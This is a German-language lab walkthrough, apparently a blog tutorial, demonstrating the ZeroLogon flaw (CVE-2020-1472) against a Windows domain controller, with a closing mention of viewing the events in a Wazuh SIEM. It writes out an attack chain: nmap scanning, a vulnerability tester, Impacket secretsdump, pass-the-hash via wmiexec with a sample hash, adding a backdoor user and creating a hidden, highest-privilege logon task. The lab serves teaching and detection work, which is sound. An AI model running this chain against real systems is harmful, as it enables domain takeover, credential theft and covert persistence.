
Erklärung und Demonstration der ZeroLogon-Sicherheitslücke (CVE-2020-1472)
Erklärung und Demonstration der ZeroLogon-Schwachstelle (CVE-2020-1472)
Der Zweck dieses Labors ist ausschließlich zu Bildungszwecken. Die Ausführung wird nicht in Produktionsumgebungen oder auf Systemen empfohlen, die Ihnen nicht gehören.
Kontext der Schwachstelle
Diese Schwachstelle ermöglicht es einem Cyberkriminellen, die Kontrolle über einen Domänencontroller (DC) zu übernehmen. Dies geschieht durch Ändern oder Entfernen des Passworts eines Dienstkontos auf dem Controller. Der böswillige Akteur kann entweder einen Denial-of-Service verursachen oder die Kontrolle über das gesamte Netzwerk übernehmen. Im August 2020 veröffentlichte Microsoft einen Patch.
Betroffene Komponente: Microsoft Netlogon Remote Protocol (MS-NRPC)
Betroffene Windows-Versionen:
Repositories klonen
Wenn Sie es lokal ausführen möchten!
In der AWS ist es auch mit diesen Images möglich (Achtung vor den Kosten)
Extra: Ein Wazuh-Konto zur Analyse der SIEM-Ereignisse.
Tipp: Unter Kali Linux ist der SSH-Dienst standardmäßig deaktiviert – er muss manuell gestartet werden.
Bevor wir testen, ob der Server verwundbar ist, können wir nmap verwenden, um zu sehen, welche Ports offen sind:
nmap -sS -T4 -F --open -n ip
Verwenden Sie CVE-2020-1472 - Testen, ob der Zielserver verwundbar ist. Führen Sie den Befehl aus:
zerologon_tester.py <dc-name> <dc-ip>
Das Tool secretdump ist ein Teil von Impacket
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Wenn alles gut geht, können wir uns mit dem Hash anmelden Was ist ein Pass-the-Hash-Angriff?
Jetzt nur noch eine Persistenz erstellen! Das kann ein neuer Benutzer sein!
net user coringa Batman2025 /add
Erledigt! Der Benutzer wurde erfolgreich erstellt!
Es ist auch möglich, eine Aufgabe zu erstellen!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Es ist möglich, die Erstellung von Benutzern und die Ereignisse im Zusammenhang mit Pass-the-Hash und die Erstellung von Benutzern zu sehen!